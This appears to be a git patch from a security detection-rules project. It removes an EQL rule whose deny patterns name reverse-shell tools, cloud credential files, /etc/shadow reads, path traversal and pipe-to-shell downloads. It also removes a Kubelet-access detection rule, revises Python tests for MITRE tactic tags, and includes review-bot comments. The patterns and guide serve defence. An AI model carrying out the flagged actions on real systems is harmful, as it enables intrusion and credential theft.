"*ruby* -e*", "*lua* -e*", "*node * -e *", - - /* Encoding / Decoding */ - "*base64 -*d*", "*|*base64 *", "*xxd *", "*openssl*enc * -d *", - - /* Reverse Shells */ - "*netcat *", "* nc *", "*ncat *", "*/dev/tcp*", "*/dev/udp/*", " *socat *", "*openssl*s_client *", "*stty*raw*-echo*", - - /* File 
Access */ - "*>*/etc/cron*", "*/etc/ssh*", "*/home/*/.ssh/*", "*/root/.ssh*", "*~/.ssh/*", "*/etc/shadow*", "*/etc/passwd*", "*chpasswd*", - - /* AWS Credentials */ - "*aws_access_key_id*", "*aws_secret_access_key*", "*aws_session_token*", "*accesskeyid*", "*secretaccesskey*", - "*access_key*", "*.aws/credentials*", "*/.aws/config*", - - /* Azure Credentials */ - "*AZURE_CLIENT_ID*", "*AZURE_TENANT_ID*", "*AZURE_CLIENT_SECRET*", "*AZURE_FEDERATED_TOKEN_FILE*", - "*IDENTITY_ENDPOINT*", "*IDENTITY_HEADER*", "*MSI_ENDPOINT*", "*MSI_SECRET*", "*/.azure/*", - "*/run/secrets/azure/*", - - /* GCP Credentials */ - "*/.config/gcloud/*", "*application_default_credentials.json*", "*type: service_account*", - "*client_email*", "*private_key_id*", "*private_key*", "*/run/secrets/google/*", "*GOOGLE_APPLICATION_CREDENTIALS*", - - /* Misc. Cloud */ - "*/.docker/config.json*", "*/.npmrc*", "*/secrets/kubernetes.io/serviceaccount/*", - - /* Helpers */ - "*nohup*", "*setsid *", "*timeout *sh -c *", "*disown*", "*env *sh *-c*", - - /* Miscellaneous */ - "*echo *", "*chattr *", "*busybox *", "*#!*", "*chmod +x *", "*chmod 777*", - - /* Decompression */ - "*gzip -*d *", "*bzip2 -*d *", "*xz -*d *", "*tar -*x*", - - /* Path Traversal */ - "*../../../*etc/*", "*/.../*", "*../../../*home/*/*", "*../../../*root/*", - - "*|*sh", "*|*python*", "*|*php*", "*|*perl*", "*|*ruby*", "*|*node*", "*|*lua*", "*|*busybox*" - ) or - ( - process.args like ("*wget *", "*curl *") and ( - ( - process.args like~ ("* -o *", "* --output*", "* -o- *") and - process.args regex ".*[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}.*" - ) or - ( - process.args like ("*http://*", "*https://*") and - process.args like ( - "* /tmp/*", "* /var/tmp/*", "* /dev/shm/* ", "* /var/www/*", "* ~/*", - "* /home/*", "* /run/*", "* /var/run/*" - ) - ) - ) - ) -) and -not ( - (process.parent.name == "nginx" and process.args like ("chmod 777 /etc/resty-*", "resty*")) or - (process.parent.name == "apache2" and ( - process.args in 
( - "/usr/local/bin/php -r 'echo phpversion();'", - "/usr/local/bin/php -r 'echo phpversion();'", - "/usr/bin/php -r 'echo phpversion();'" - ) or - process.args like """bash -c "( /home/*/apps/richdocumentscode/collabora/Collabora_Online.AppImage*""" - ) - ) or - (process.parent.name like "php-fpm*" and process.args in ( - "/usr/bin/php -r 'echo phpversion();'", - "/usr/bin/php -r 'echo phpversion();'", - "php -r 'print_r(phpversion());'", - "chattr -i -a /usr/local/virtualizor/license2.php" - ) - ) or - (process.parent.name == "php-cgi" and process.args like ( - "nohup php /home/*/public_html/lockindex.php index.php >/dev/null 2>&1 &", - "nohup php /home/*/public_html/wp-content/* >> /dev/null 2>&1 &", - "nohup php /home/*/public_html/wp-includes/* >> /dev/null 2>&1 &", - "nohup php /home/*/public_html/*/wp-content/* >> /dev/null 2>&1 &" - ) - ) -) -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - -[rule.threat.tactic] -id = "TA0003" -name 
= "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/cloud_defend/lateral_movement_potential_direct_kubelet_access_via_process_args.toml b/rules/integrations/cloud_defend/lateral_movement_potential_direct_kubelet_access_via_process_args.toml deleted file mode 100644 index 291fd00fe82..00000000000 --- a/rules/integrations/cloud_defend/lateral_movement_potential_direct_kubelet_access_via_process_args.toml +++ /dev/null 
@@ -1,94 +0,0 @@ -[metadata] -creation_date = "2026/02/02" -integration = ["cloud_defend"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects potential direct Kubelet access via process arguments. An adversary may need to access the -Kubelet API to gain access to the Kubernetes API server or other resources within the cluster. These requests -are often used to enumerate or execute commands on the Kubernetes API server or other resources within the -cluster, and may indicate an attempt to move laterally within the cluster. -""" -from = "now-6m" -index = ["logs-cloud_defend.process*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Potential Direct Kubelet Access via Process Arguments Detected via Defend for Containers" -note = """ ## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Potential Direct Kubelet Access via Process Arguments Detected via Defend for Containers - -This detection flags an interactive process started inside a Linux container that includes an HTTP request targeting the Kubelet API on port 10250, a common pivot point for gaining execution and visibility across nodes. Attackers use direct Kubelet access to enumerate pods, fetch logs, or run commands that can lead to broader cluster access and lateral movement. A typical pattern is invoking curl or wget from a container shell against `https://:10250/` endpoints to probe or execute actions. 
- -### Possible investigation steps - -- Identify the originating pod/workload and container image for the interactive session, then determine whether the container was expected to provide diagnostic tooling or shell access and whether it recently changed. -- Extract the full command line and reconstruct the requested Kubelet endpoint path (for example `/pods`, `/exec`, `/run`, `/logs`) to infer intent (enumeration vs remote execution) and capture any embedded tokens or client cert usage. -- Correlate the process start time with Kubernetes audit logs and API server events to see if there were concurrent pod exec/attach, secret reads, or workload modifications suggesting follow-on activity. -- Verify whether the destination node IP/hostname is the local node or a remote node and review network flow logs/egress policies to confirm the container could reach port 10250 and whether other nodes were contacted. -- Check node and Kubelet configuration for exposure and auth bypass risk (anonymous auth, webhook mode, client certs), and inspect Kubelet logs around the timestamp for the corresponding request and response status codes. - -### False positive analysis - -- A cluster operator or SRE opens an interactive shell in a troubleshooting container and manually curls `https://:10250/` (or `/pods`/`/metrics`) to validate Kubelet reachability, authentication behavior, or node health during incident triage. -- A legitimate in-container diagnostic workflow uses an interactive session to probe the local node’s Kubelet port 10250 for environment verification (e.g., confirming node IP mapping or TLS/cert configuration), embedding the URL in process arguments without any intent to enumerate or execute actions across the cluster. 
- -### Response and remediation - -- Isolate the affected pod by removing service exposure and applying a temporary egress deny rule to block traffic to node port 10250 from that namespace/pod label, then terminate the interactive shell session and restart the workload from a known-good image. -- Capture and preserve the full command line, container filesystem changes, and relevant Kubelet and Kubernetes audit log entries around the timestamp, then hunt for additional in-cluster attempts to reach `https://:10250/` from other pods or namespaces. -- Rotate any credentials that may have been exposed or used (service account tokens, client certificates, kubeconfig files) and revoke or redeploy affected service accounts, then validate no unauthorized `exec/attach`, secret reads, or workload changes occurred after the access attempt. -- Escalate to the platform security/on-call incident commander immediately if the Kubelet request targeted sensitive endpoints like `/exec`, `/run`, `/containerLogs`, or returned successful responses (2xx/3xx) or if similar commands are seen across multiple nodes. -- Harden by enforcing Kubelet authentication/authorization (disable anonymous access, require webhook authz, restrict client cert issuance), and implement network controls that prevent pods from reaching node Kubelet ports except from approved node-local agents. -- Reduce recurrence by removing shell and HTTP tooling from application images, limiting interactive access (disable `kubectl exec` for non-admins), and tightening RBAC and admission policies to block privileged pods/host networking that increase node API reachability. 
-""" -references = [ - "https://heilancoos.github.io/research/2025/12/16/kubernetes.html#kubelet-api", - "https://www.cyberark.com/resources/threat-research-blog/using-kubelet-client-to-attack-the-kubernetes-cluster", - "https://www.aquasec.com/blog/kubernetes-exposed-exploiting-the-kubelet-api/" -] -risk_score = 47 -rule_id = "b4bd186b-69c6-45ad-8bef-5c35bbadeaef" -severity = "medium" -tags = ["Tactic: Discovery", "Tactic: Lateral Movement", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and -process.args like "http*:10250*" and process.interactive == true and container.id like "?*" -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/tests/test_all_rules.py b/tests/test_all_rules.py index 2aef99982dc..584b6fba1cf 100644 --- a/tests/test_all_rules.py +++ b/tests/test_all_rules.py @@ -11,7 +11,6 @@ import uuid from collections import defaultdict from pathlib import Path -from typing import Any import eql import kql 
@@ -44,39 +43,6 @@ PACKAGE_STACK_VERSION = Version.parse(current_stack_version(), optional_minor_and_patch=True) -def _flat_threat_tactic_names(threat: list[Any]) -> list[str]: - """Tactic display names from ``rule.threat`` in encounter order (may repeat).""" - names: list[str] = [] - for entry in threat: - tactic = getattr(entry, "tactic", None) - if tactic is None: - continue - raw = getattr(tactic, "name", None) - if raw: - names.append(str(raw)) - return names - - -def _mitre_tactic_tag_gaps( - rule_tags: list[str], - threat_tactic_names: list[str], - attack_tactics_set: set[str], - *, - prefix: str = "Tactic: ", -) -> tuple[list[str], list[str]]: - """``(missing Tactic tags, orphan MITRE tactic names on tags)``.""" - unique_names = list(dict.fromkeys(threat_tactic_names)) - missing = [f"{prefix}{name}" for name in unique_names if f"{prefix}{name}" not in rule_tags] - tagged_mitre: list[str] = [] - for t in rule_tags: - if isinstance(t, str) and t.startswith(prefix): - suffix = t.removeprefix(prefix).strip() - if suffix in attack_tactics_set: - tagged_mitre.append(suffix) - unexpected = [n for n in tagged_mitre if n not in threat_tactic_names] - return missing, unexpected - - class TestValidRules(BaseRuleTest): """Test that all detection rules load properly without duplicates.""" 
@@ -397,16 +363,16 @@ def test_tactic_to_technique_correlations(self): ) def test_duplicated_tactics(self): - """Check that a tactic is only defined once per framework (ATT&CK vs ATLAS may share display names).""" + """Check that a tactic is only defined once.""" for rule in self.all_rules: threat_mapping = rule.contents.data.threat - pairs = [(t.framework, t.tactic.name) for t in threat_mapping or []] - duplicates = sorted({p for p in pairs if pairs.count(p) > 1}) + tactics = [t.tactic.name for t in threat_mapping or []] + duplicates = sorted({t for t in tactics if tactics.count(t) > 1}) if duplicates: self.fail( f"{self.rule_str(rule)} duplicate tactics defined for {duplicates}. " - f"Flatten to a single entry per tactic within each framework" + f"Flatten to a single entry per tactic" ) 
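Review bot: `tactics = [t.tactic.name for t in threat_mapping or []]` keys the duplicate check on the bare display name again, so a rule that maps a same-named tactic under two frameworks (the docstring being removed names ATT&CK and ATLAS as such a pair) would now be reported as a duplicate; if that case exists in the rule set, the key should stay `(t.framework, t.tactic.name)`, and if it does not, the restored docstring should say that one tactic name per rule is the intended contract so the next reader does not re-add the framework dimension. A smaller point of style: `tactics.count(t)` inside the set comprehension rescans the list once per element, and the idiomatic form is `collections.Counter`, e.g. `duplicates = sorted(name for name, n in Counter(tactics).items() if n > 1)`, with `Counter` added to the existing `from collections import defaultdict` line. The enclosing class continues outside the hunk.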
@@ -504,42 +470,45 @@ def test_bbr_tags(self): error_rules = "\n".join(invalid_bbr_rules) self.fail(f"The following building block rule(s) have missing tag: Rule Type: BBR:\n{error_rules}") - def test_threat_tactics_have_matching_tags(self): - """MITRE ATT&CK tactics in ``rule.threat`` must match ``Tactic: `` tags (and vice versa for ATT&CK names). - - Replaces the legacy check that tied the rule filename prefix to the first tactic tag. - """ - from detection_rules.attack import tactics as attack_tactic_names + def test_primary_tactic_as_tag(self): + """Test that the primary tactic is present as a tag.""" + from detection_rules.attack import tactics - prefix = "Tactic: " - attack_tactics_set = set(attack_tactic_names) invalid = [] + tactics = set(tactics) for rule in self.all_rules: - rule_tags = rule.contents.data.tags or [] + rule_tags = rule.contents.data.tags if "Continuous Monitoring" in rule_tags or rule.contents.data.type == "machine_learning": continue threat = rule.contents.data.threat - if not threat: - continue + if threat: + missing = [] + threat_tactic_names = [e.tactic.name for e in threat] + primary_tactic = f"Tactic: {threat_tactic_names[0]}" - threat_tactic_names = _flat_threat_tactic_names(threat) - missing, unexpected = _mitre_tactic_tag_gaps( - rule_tags, threat_tactic_names, attack_tactics_set, prefix=prefix - ) + # missing primary tactic + if primary_tactic not in rule.contents.data.tags: + missing.append(primary_tactic) - if missing or unexpected: - err_msg = self.rule_str(rule) - if missing: - err_msg += f"\n expected: {missing}" - if unexpected: - err_msg += f"\n unexpected (or missing from threat mapping): {unexpected}" - invalid.append(err_msg) + # listed tactic that is not in threat mapping + tag_tactics = set(rule_tags).intersection(tactics) + missing_from_threat = list(tag_tactics.difference(threat_tactic_names)) + + if missing or missing_from_threat: + err_msg = self.rule_str(rule) + if missing: + err_msg += f"\n expected: {missing}" 
+ if missing_from_threat: + err_msg += f"\n unexpected (or missing from threat mapping): {missing_from_threat}" + + invalid.append(err_msg) if invalid: - self.fail("Rules with misaligned tactic tags and threat mapping:\n" + "\n".join(invalid)) + err_msg = "\n".join(invalid) + self.fail(f"Rules with misaligned tags and tactics:\n{err_msg}") def test_os_tags(self): """Test that OS tags are present within rules.""" @@ -655,6 +624,33 @@ def test_timeline_has_title(self): class TestRuleFiles(BaseRuleTest): """Test the expected file names.""" + def test_rule_file_name_tactic(self): + """Test to ensure rule files have the primary tactic prepended to the filename.""" + bad_name_rules = [] + + for rule in self.all_rules: + rule_path = rule.path.resolve() + filename = rule_path.name + + # machine learning jobs should be in rules/ml or rules/integrations/ + if rule.contents.data.type == definitions.MACHINE_LEARNING: + continue + + threat = rule.contents.data.threat + authors = rule.contents.data.author + + if threat and "Elastic" in authors: + primary_tactic = threat[0].tactic.name + tactic_str = primary_tactic.lower().replace(" ", "_") + + if tactic_str != filename[: len(tactic_str)]: + bad_name_rules.append(f"{rule.id} - {Path(rule.path).name} -> expected: {tactic_str}") + + if bad_name_rules: + error_msg = "filename does not start with the primary tactic - update the tactic or the rule filename" + rule_err_str = "\n".join(bad_name_rules) + self.fail(f"{error_msg}:\n{rule_err_str}") + def test_bbr_in_correct_dir(self): """Ensure that BBR are in the correct directory.""" for rule in self.bbr: From df6505521e6f0d9d9c558cbc0ac2ef745e950e0f Mon Sep 17 00:00:00 2001 
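Review bot: In `test_primary_tactic_as_tag`, `tag_tactics = set(rule_tags).intersection(tactics)` compares the tags to bare tactic names while the tags carry the `Tactic: ` prefix (see `primary_tactic = f"Tactic: {threat_tactic_names[0]}"` a few lines above), so the intersection is empty for conventionally written tags and `missing_from_threat` never fires for them; in practice only the primary tactic's presence is verified. Strip the prefix before comparing, e.g. `tag_tactics = {t.removeprefix("Tactic: ") for t in rule_tags if t.startswith("Tactic: ")} & tactics`. Two smaller points: `rule_tags = rule.contents.data.tags` drops the `or []` fallback the removed version had, so a rule whose `tags` is unset would raise a TypeError on the `in` check if that field can be empty, and rebinding the imported name with `tactics = set(tactics)` shadows the import — a separate name such as `tactic_names` reads more clearly. `test_primary_tactic_as_tag` is entirely within this hunk; the hunk's opening lines belong to `test_bbr_tags`, which starts outside it.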
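Review bot: In `test_rule_file_name_tactic`, `tactic_str != filename[: len(tactic_str)]` is a hand-rolled prefix test; `if not filename.startswith(tactic_str):` says the same thing without the slice arithmetic, and the error line can reuse `filename` instead of recomputing `Path(rule.path).name`. The comment `# machine learning jobs should be in rules/ml or rules/integrations/` describes a directory convention, but the line under it only skips ML rules from the filename check, so something like `# machine learning rules are exempt from the tactic filename prefix` would match what the code does. The check also pins the filename to `threat[0]`, the first threat entry, which makes entry order in `rule.threat` significant; that deserves a sentence in the docstring. The function is entirely within this hunk.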
From: Mika Ayenson Date: Tue, 24 Mar 2026 18:10:32 -0500 Subject: [PATCH 11/16] add supplemental mitre mappings --- ...mmand_and_control_common_llm_endpoint.toml | 10 +- ...rol_curl_wget_spawn_via_nodejs_parent.toml | 35 ++-- ..._google_drive_malicious_file_download.toml | 15 +- ...and_and_control_pan_elastic_defend_c2.toml | 7 +- ...nd_control_suricata_elastic_defend_c2.toml | 25 ++- .../command_and_control_tunnel_qemu.toml | 13 +- ...s_genai_process_sensitive_file_access.toml | 34 +++- .../credential_access_gitleaks_execution.toml | 30 +++- ...redential_access_trufflehog_execution.toml | 25 ++- ...evasion_agent_spoofing_multiple_hosts.toml | 20 ++- ...e_evasion_deleting_websvr_access_logs.toml | 8 +- ...sion_elastic_agent_service_terminated.toml | 15 +- ..._evasion_encoding_rot13_python_script.toml | 29 +++- ...nse_evasion_genai_config_modification.toml | 16 +- ...n_genai_process_compiling_executables.toml | 23 ++- ...ss_encoding_prior_to_network_activity.toml | 39 ++++- ...ion_masquerading_space_after_filename.toml | 20 ++- ...asion_whitespace_padding_command_line.toml | 14 +- ...y_virtual_machine_fingerprinting_grep.toml | 21 ++- ..._server_local_file_inclusion_activity.toml | 46 +++++- ...server_remote_file_inclusion_activity.toml | 15 +- .../execution_aws_ec2_lolbin_via_ssm.toml | 18 ++- ...m_sendcommand_with_command_parameters.toml | 20 ++- ...rnetes_api_request_by_usual_utilities.toml | 7 +- ...ct_interactive_kubernetes_api_request.toml | 7 +- ...tes_api_activity_by_unusual_utilities.toml | 22 ++- ...ss_followed_by_kubernetes_api_request.toml | 25 ++- .../execution_git_exploit_cve_2025_48384.toml | 41 +++-- ..._pre_or_post_install_script_execution.toml | 25 ++- ...xecution_openclaw_agent_child_process.toml | 61 ++++++- ...ontainer_creation_with_host_reference.toml | 7 +- ...cution_register_github_actions_runner.toml | 22 ++- .../execution_revershell_via_shell_cmd.toml | 16 +- .../execution_sap_netweaver_jsp_webshell.toml | 23 ++- 
...execution_sap_netweaver_webshell_exec.toml | 56 ++++++- ...tion_suspicious_java_netcon_childproc.toml | 28 +++- .../execution_via_github_actions_runner.toml | 53 ++++++- ...er_tracking_id_tampering_via_env_vars.toml | 81 +++++----- ...ccess_execution_susp_react_serv_child.toml | 76 ++++++++- ...s_exfiltration_new_usb_device_mounted.toml | 21 ++- ...s_file_upload_followed_by_get_request.toml | 15 +- ...ial_access_ollama_api_external_access.toml | 10 +- ..._access_zoom_meeting_with_no_passcode.toml | 10 +- ...eb_server_potential_command_injection.toml | 71 ++++++++- ...lege_escalation_echo_nopasswd_sudoers.toml | 23 ++- ...ation_setuid_setgid_bit_set_via_chmod.toml | 20 ++- ...ilege_escalation_sudo_buffer_overflow.toml | 13 +- ...privilege_escalation_sudoers_file_mod.toml | 20 ++- .../privilege_escalation_trap_execution.toml | 20 ++- ...collection_cloudtrail_logging_created.toml | 21 ++- ...nticated_bucket_access_by_rare_source.toml | 20 ++- ...cess_aws_getpassword_for_ec2_instance.toml | 23 ++- ...keyquarantine_policy_attached_to_user.toml | 21 ++- ...ial_access_iam_user_addition_to_group.toml | 25 ++- ...etrieval_attempts_from_secretsmanager.toml | 23 ++- ...cess_root_console_failure_brute_force.toml | 8 +- ...se_evasion_cloudtrail_logging_deleted.toml | 10 +- ..._evasion_cloudtrail_logging_suspended.toml | 10 +- ...ion_ec2_serial_console_access_enabled.toml | 13 +- ...defense_evasion_rds_instance_restored.toml | 23 ++- ...sion_s3_bucket_configuration_deletion.toml | 15 +- .../aws/defense_evasion_sqs_purge_queue.toml | 18 ++- ...ess_rule_added_for_remote_connections.toml | 18 ++- ...eration_via_update_assume_role_policy.toml | 20 ++- ..._multiple_discovery_api_calls_via_cli.toml | 10 +- ...overy_new_terms_sts_getcalleridentity.toml | 10 +- ...s_multi_region_service_quota_requests.toml | 10 +- ...iscovery_ssm_inventory_reconnaissance.toml | 9 +- ...cution_cloudshell_environment_created.toml | 23 ++- ...mbda_external_layer_added_to_function.toml | 21 ++- 
..._new_terms_cloudformation_createstack.toml | 9 +- ...tration_dynamodb_scan_by_unusual_user.toml | 13 +- ...tration_dynamodb_table_exported_to_s3.toml | 18 ++- .../aws/exfiltration_ec2_export_task.toml | 16 +- ..._full_network_packet_capture_detected.toml | 22 ++- .../aws/exfiltration_rds_snapshot_export.toml | 18 ++- ...icy_added_for_external_account_access.toml | 19 ++- ...bucket_replicated_to_external_account.toml | 13 +- ...tration_s3_uncommon_client_user_agent.toml | 18 ++- ...ns_rare_protocol_subscription_by_user.toml | 29 +++- ..._eventbridge_rule_disabled_or_deleted.toml | 21 ++- ..._s3_bucket_enumeration_or_brute_force.toml | 16 +- .../impact_cloudtrail_logging_updated.toml | 26 ++- .../impact_cloudwatch_log_group_deletion.toml | 13 +- ...impact_cloudwatch_log_stream_deletion.toml | 13 +- .../impact_ec2_disable_ebs_encryption.toml | 23 ++- ...mpact_ec2_ebs_snapshot_access_removed.toml | 21 ++- .../aws/impact_iam_deactivate_mfa_device.toml | 26 ++- ...mk_disabled_or_scheduled_for_deletion.toml | 8 +- ..._cluster_deletion_protection_disabled.toml | 21 ++- .../aws/impact_rds_snapshot_deleted.toml | 8 +- ...t_object_uploaded_with_ransom_keyword.toml | 16 +- ...mpact_s3_static_site_js_file_uploaded.toml | 15 +- ..._unusual_object_encryption_with_sse_c.toml | 21 ++- .../initial_access_console_login_root.toml | 20 +-- ...on_token_used_from_multiple_addresses.toml | 23 ++- ...kali_user_agent_detected_with_aws_cli.toml | 23 ++- .../aws/initial_access_password_recovery.toml | 8 +- ...tance_connect_ssh_public_key_uploaded.toml | 28 +++- ...l_movement_ec2_instance_console_login.toml | 63 +++++++- ...ns_topic_message_publish_by_rare_user.toml | 24 ++- .../ml_cloudtrail_rare_method_by_city.toml | 19 ++- .../ml_cloudtrail_rare_method_by_user.toml | 55 +++++-- ...ttempt_to_register_virtual_mfa_device.toml | 19 ++- .../persistence_ec2_network_acl_creation.toml | 17 +- ...e_ec2_route_table_modified_or_deleted.toml | 19 ++- ..._group_configuration_change_detection.toml | 
30 +++- ..._iam_api_calls_via_user_session_token.toml | 21 ++- ...nce_iam_create_login_profile_for_root.toml | 10 +- ...persistence_iam_oidc_provider_created.toml | 28 +++- ...ce_iam_roles_anywhere_profile_created.toml | 23 ++- ...usted_anchor_created_with_external_ca.toml | 10 +- ...persistence_iam_saml_provider_created.toml | 18 ++- ..._created_access_keys_for_another_user.toml | 24 +-- ...oor_invoke_function_for_any_principal.toml | 21 ++- ...nce_rds_db_instance_password_modified.toml | 14 +- .../persistence_rds_instance_made_public.toml | 13 +- ...oute_53_domain_transfer_lock_disabled.toml | 21 ++- ..._53_hosted_zone_associated_with_a_vpc.toml | 21 ++- .../aws/persistence_route_table_created.toml | 19 ++- ...e_sensitive_operations_via_cloudshell.toml | 27 +++- ...sistence_sts_assume_role_with_new_mfa.toml | 33 +++- ...tratoraccess_policy_attached_to_group.toml | 24 +-- ...stratoraccess_policy_attached_to_role.toml | 24 +-- ...stratoraccess_policy_attached_to_user.toml | 24 +-- ...tomer_managed_policy_attached_to_role.toml | 23 ++- ..._escalation_iam_saml_provider_updated.toml | 23 ++- ...alation_iam_update_assume_role_policy.toml | 29 +++- ...escalation_role_assumption_by_service.toml | 13 +- ...ge_escalation_role_assumption_by_user.toml | 36 ++++- ...oot_from_rare_user_and_member_account.toml | 38 ++++- ...rivilege_escalation_sts_role_chaining.toml | 31 +++- ...point_access_from_unusual_application.toml | 35 +++- ...ss_by_unusual_public_client_via_graph.toml | 24 ++- ...s_azure_entra_susp_device_code_signin.toml | 19 ++- ...al_signin_then_arc_credential_listing.toml | 17 +- ...ial_access_entra_id_suspicious_signin.toml | 35 +++- ..._access_key_vault_excessive_retrieval.toml | 18 ++- ..._full_network_packet_capture_detected.toml | 16 +- ...ccess_storage_account_key_regenerated.toml | 26 ++- ...se_evasion_automation_runbook_deleted.toml | 14 +- .../defense_evasion_event_hub_deletion.toml | 18 ++- ...nse_evasion_kubernetes_events_deleted.toml | 10 +- 
...ense_evasion_network_watcher_deletion.toml | 10 +- ...curity_alert_suppression_rule_created.toml | 8 +- ...utomation_runbook_created_or_modified.toml | 15 +- ...torage_blob_download_azcopy_sas_token.toml | 18 ++- ...ct_key_vault_modified_by_unusual_user.toml | 19 ++- ...ster_credential_access_unusual_source.toml | 28 +++- ...e_principal_signin_multiple_countries.toml | 23 ++- ..._actor_token_user_impersonation_abuse.toml | 26 ++- ...d_device_code_auth_with_broker_client.toml | 32 ++-- ...s_entra_id_external_guest_user_invite.toml | 16 +- ..._id_federated_login_by_unusual_client.toml | 27 +++- ...a_id_first_time_seen_device_code_auth.toml | 32 ++-- ...ingle_session_from_multiple_addresses.toml | 15 +- ...sent_grant_via_registered_application.toml | 21 ++- ..._code_grant_unusual_app_resource_user.toml | 28 +++- ...via_first_party_microsoft_application.toml | 28 +++- ...s_entra_id_protection_alerts_for_user.toml | 41 ++++- ...ra_id_protection_confirmed_compromise.toml | 41 ++++- ...tra_id_rare_app_id_for_principal_auth.toml | 26 ++- ...cation_requirement_for_principal_user.toml | 22 ++- ...ous_oauth_flow_via_auth_broker_to_drs.toml | 29 +++- ...s_entra_id_unusual_ropc_login_attempt.toml | 23 ++- ...al_access_entra_id_user_reported_risk.toml | 17 +- ...ph_first_occurrence_of_client_request.toml | 26 ++- .../azure/ml_azure_rare_event_failures.toml | 49 +++--- .../azure/ml_azure_rare_method_by_city.toml | 38 ++++- .../ml_azure_rare_method_by_country.toml | 20 ++- .../azure/ml_azure_rare_method_by_user.toml | 55 +++++-- ...ersistence_automation_account_created.toml | 23 +-- ...d_application_credential_modification.toml | 24 ++- ...id_conditional_access_policy_modified.toml | 21 ++- ...id_global_administrator_role_assigned.toml | 23 ++- ...stence_entra_id_mfa_disabled_for_user.toml | 41 ++++- ..._entra_id_pim_user_added_global_admin.toml | 22 ++- ...ged_identity_management_role_modified.toml | 25 ++- ...rt_to_prt_transition_from_user_device.toml | 29 +++- 
...d_service_principal_credentials_added.toml | 22 ++- ...e_principal_federated_issuer_modified.toml | 28 +++- ...ntra_id_suspicious_adrs_token_request.toml | 18 ++- ..._suspicious_cloud_device_registration.toml | 23 ++- ...nant_domain_federation_via_audit_logs.toml | 35 +++- ..._added_as_owner_for_azure_application.toml | 19 ++- ..._as_owner_for_azure_service_principal.toml | 23 ++- ...id_user_signed_in_from_unusual_device.toml | 28 +++- ...sistence_event_hub_created_or_updated.toml | 28 +++- ...ce_graph_eam_addition_or_modification.toml | 23 ++- ..._protect_alert_followed_by_device_reg.toml | 21 +-- ...ure_rbac_administrator_roles_assigned.toml | 24 ++- ..._elevate_to_user_administrator_access.toml | 23 ++- ...on_kubernetes_aks_rolebinding_created.toml | 20 ++- .../command_and_control_beaconing.toml | 12 +- ...and_control_beaconing_high_confidence.toml | 12 +- ...socks_proxy_detected_inside_container.toml | 7 +- ...teractive_file_download_from_internet.toml | 55 ++++--- ...control_tunneling_and_port_forwarding.toml | 7 +- ...cloud_creds_search_inside_a_container.toml | 15 +- ..._files_compression_inside_a_container.toml | 7 +- ...r_passwords_search_inside_a_container.toml | 33 +++- ...ss_service_account_token_or_cert_read.toml | 15 +- ..._decoded_payload_piped_to_interpreter.toml | 89 ++++++----- ...le_creation_execution_deletion_cradle.toml | 15 +- ...s_execution_from_suspicious_directory.toml | 44 +++-- ...ed_object_modified_inside_a_container.toml | 38 ++++- ...potential_evasion_via_encoded_payload.toml | 7 +- .../discovery_dns_enumeration.toml | 23 +-- .../discovery_environment_enumeration.toml | 12 +- ...overy_kubelet_certificate_file_access.toml | 20 ++- ...t_pod_discovery_via_builtin_utilities.toml | 7 +- ..._enumeration_from_interactive_process.toml | 13 +- ...covery_service_account_namespace_read.toml | 25 ++- ...work_tool_launched_inside_a_container.toml | 15 +- ...nt_binary_launched_inside_a_container.toml | 15 +- 
